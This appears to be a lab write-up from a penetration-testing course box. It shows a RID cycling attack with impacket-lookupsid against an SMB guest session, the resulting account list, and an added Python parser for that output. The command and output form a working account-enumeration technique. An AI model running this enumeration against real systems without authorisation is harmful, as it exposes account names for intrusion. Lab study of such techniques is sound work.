RID Cycling
The target SMB server allows a guest session with read access to the IPC$ share.
This means a RID cycling attack can be used to brute-force RIDs and resolve them to account names.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/compromised]
└─$ impacket-lookupsid blah@$IP 1000000
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Brute forcing SIDs at 192.168.225.152
[*] StringBinding ncacn_np:192.168.225.152[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-537427935-490066102-1511301751
500: COMPROMISED\Administrator (SidTypeUser)
501: COMPROMISED\Guest (SidTypeUser)
503: COMPROMISED\DefaultAccount (SidTypeUser)
504: COMPROMISED\WDAGUtilityAccount (SidTypeUser)
513: COMPROMISED\None (SidTypeGroup)
1000: COMPROMISED\scripting (SidTypeUser)
Performing the RID cycling attack with an arbitrary credential (here the username blah with an empty password) against the target SMB service identified a non-default user account named scripting at RID 1000.
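As an added example (not part of the original notes or of Impacket), a small Python parser for the impacket-lookupsid output above: it recovers the domain SID, rebuilds each account's full SID, separates Windows' reserved RIDs (below 1000) from accounts created after installation, and checks whether any well-known RID carries a name other than its default. The sample text is the output shown on this page, embedded as a constant.

```python
import re

# Constructed sample: the impacket-lookupsid output shown on this page.
SAMPLE_OUTPUT = """\
[*] Brute forcing SIDs at 192.168.225.152
[*] StringBinding ncacn_np:192.168.225.152[\\pipe\\lsarpc]
[*] Domain SID is: S-1-5-21-537427935-490066102-1511301751
500: COMPROMISED\\Administrator (SidTypeUser)
501: COMPROMISED\\Guest (SidTypeUser)
503: COMPROMISED\\DefaultAccount (SidTypeUser)
504: COMPROMISED\\WDAGUtilityAccount (SidTypeUser)
513: COMPROMISED\\None (SidTypeGroup)
1000: COMPROMISED\\scripting (SidTypeUser)
"""

DOMAIN_SID_RE = re.compile(r"Domain SID is: (S-1-5-21(?:-\d+){3})")
ENTRY_RE = re.compile(r"^(\d+): ([^\\]+)\\(.+?) \((SidType\w+)\)$")

# RIDs below 1000 are reserved by Windows for built-in principals; accounts
# created after installation start at 1000, so that is the interesting set.
FIRST_CUSTOM_RID = 1000

# Default names of the well-known local RIDs seen in the sample. The RID is
# fixed even if an administrator renames the account, which is why RID
# cycling still reveals which account is the real Administrator.
WELL_KNOWN = {500: "Administrator", 501: "Guest",
              503: "DefaultAccount", 504: "WDAGUtilityAccount"}


def parse_lookupsid(text):
    """Return (domain_sid, entries); each entry has rid, domain, name, type, sid, custom."""
    m = DOMAIN_SID_RE.search(text)
    if not m:
        raise ValueError("domain SID line not found in output")
    domain_sid = m.group(1)
    entries = []
    for line in text.splitlines():
        e = ENTRY_RE.match(line.strip())
        if not e:
            continue
        rid = int(e.group(1))
        entries.append({"rid": rid, "domain": e.group(2), "name": e.group(3),
                        "type": e.group(4), "sid": f"{domain_sid}-{rid}",
                        "custom": rid >= FIRST_CUSTOM_RID})
    return domain_sid, entries


def custom_users(text):
    """Names of post-installation user accounts exposed by the enumeration."""
    return [e["name"] for e in parse_lookupsid(text)[1]
            if e["custom"] and e["type"] == "SidTypeUser"]


def renamed_builtins(text):
    """Well-known RIDs whose current name differs from the Windows default."""
    return [(e["rid"], e["name"]) for e in parse_lookupsid(text)[1]
            if e["rid"] in WELL_KNOWN and e["name"] != WELL_KNOWN[e["rid"]]]
```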